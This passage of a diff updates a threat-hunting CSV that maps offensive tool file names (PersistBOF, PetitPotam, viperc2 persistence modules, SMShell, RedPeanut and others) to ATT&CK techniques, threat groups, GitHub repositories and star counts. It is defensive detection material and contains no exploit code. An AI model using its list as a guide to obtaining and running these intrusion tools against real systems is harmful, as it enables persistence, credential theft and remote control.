PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Persistence/InstallWMI*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Persistence_AccountManipulation_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Persistence_Guard_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
@@ -14692,28 +14858,28 @@ "*Persistence_RegistryRunKeys_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Persistence_ScheduledTask_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Persistence_WinlogonHelperDLL_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*PersistenceBOF.c*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*PersistenceBOF.exe*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersistenceBOF.c*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersistenceBOF.exe*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persistent-security/SMShell*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" -"*persist-ice-junction.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-monitor.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-shortcut.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-time.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-xll.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-junction.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-monitor.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" 
+"*persist-ice-shortcut.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-time.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-xll.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*PersStartup.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PEScrambler.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*PetitPotam.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*PetitPotam.cpp*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.cpp*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*PetitPotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.ps1*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*petitpotam.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*petitpotam.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" 
"*petitpotam.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PetitPotam.py*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.py*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.sln*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*PetitPotam.sln*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation 